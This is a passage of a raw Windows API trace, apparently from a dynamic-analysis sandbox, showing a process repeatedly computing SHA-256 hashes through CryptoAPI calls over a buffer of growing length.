	[0199.535] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.536] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.536] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0199.536] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690fd8
	[0199.536] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690fd8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690fd8, pdwDataLen=0x1283b0) returned 1
	[0199.536] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.536] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.536] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.536] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.536] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0199.536] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691000
	[0199.536] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691000, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691000, pdwDataLen=0x1283b0) returned 1
	[0199.536] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.536] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.536] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.537] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.537] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0199.537] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691028
	[0199.537] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691028, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691028, pdwDataLen=0x1283b0) returned 1
	[0199.537] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.537] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.537] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.537] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.537] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0199.537] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691050
	[0199.537] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691050, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691050, pdwDataLen=0x1283b0) returned 1
	[0199.537] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.537] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.537] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.538] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.538] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0199.538] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691078
	[0199.538] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691078, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691078, pdwDataLen=0x1283b0) returned 1
	[0199.538] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.538] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.538] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.538] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.538] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0199.538] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26910a0
	[0199.538] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26910a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26910a0, pdwDataLen=0x1283b0) returned 1
	[0199.538] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.538] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.538] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.539] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.539] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0199.539] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26910c8
	[0199.539] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26910c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26910c8, pdwDataLen=0x1283b0) returned 1
	[0199.539] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.539] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.539] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.539] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.539] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0199.539] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26910f0
	[0199.539] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26910f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26910f0, pdwDataLen=0x1283b0) returned 1
	[0199.539] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.539] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.539] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.540] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.540] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0199.540] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691118
	[0199.540] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691118, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691118, pdwDataLen=0x1283b0) returned 1
	[0199.540] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.540] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.540] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.645] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.645] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0199.645] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691140
	[0199.645] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691140, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691140, pdwDataLen=0x1283b0) returned 1
	[0199.645] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.645] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.646] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.646] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.646] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0199.646] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691168
	[0199.646] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691168, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691168, pdwDataLen=0x1283b0) returned 1
	[0199.646] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.646] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.646] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.646] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.646] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0199.646] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691190
	[0199.647] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691190, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691190, pdwDataLen=0x1283b0) returned 1
	[0199.647] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.647] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.647] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.647] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.647] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0199.647] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26911b8
	[0199.647] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26911b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26911b8, pdwDataLen=0x1283b0) returned 1
	[0199.647] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.647] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.647] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.647] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.647] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0199.647] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26911e0
	[0199.648] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26911e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26911e0, pdwDataLen=0x1283b0) returned 1
	[0199.648] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.648] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.648] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.648] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.648] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0199.648] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691208
	[0199.648] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691208, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691208, pdwDataLen=0x1283b0) returned 1
	[0199.648] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.648] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.648] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.648] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.648] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0199.648] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691230
	[0199.649] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691230, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691230, pdwDataLen=0x1283b0) returned 1
	[0199.649] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.649] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.649] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.649] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.649] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0199.649] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691258
	[0199.649] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691258, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691258, pdwDataLen=0x1283b0) returned 1
	[0199.649] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.649] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.649] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.650] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.650] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0199.650] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691280
	[0199.650] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691280, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691280, pdwDataLen=0x1283b0) returned 1
	[0199.650] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.650] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.650] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.650] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.650] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0199.650] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26912a8
	[0199.650] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26912a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26912a8, pdwDataLen=0x1283b0) returned 1
	[0199.650] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.650] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.650] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.651] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.651] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0199.651] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26912d0
	[0199.651] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26912d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26912d0, pdwDataLen=0x1283b0) returned 1
	[0199.651] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.651] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.651] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.651] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.651] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0199.651] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26912f8
	[0199.651] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26912f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26912f8, pdwDataLen=0x1283b0) returned 1
	[0199.651] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.651] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.651] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.652] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.652] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0199.652] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691320
	[0199.652] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691320, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691320, pdwDataLen=0x1283b0) returned 1
	[0199.652] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.652] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.652] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.652] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.652] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0199.652] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691348
	[0199.652] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691348, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691348, pdwDataLen=0x1283b0) returned 1
	[0199.652] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.652] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.653] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.653] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.653] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0199.653] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691370
	[0199.653] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691370, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691370, pdwDataLen=0x1283b0) returned 1
	[0199.653] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.653] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.653] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.653] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.653] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0199.653] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691398
	[0199.653] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691398, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691398, pdwDataLen=0x1283b0) returned 1
	[0199.654] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.654] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.654] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
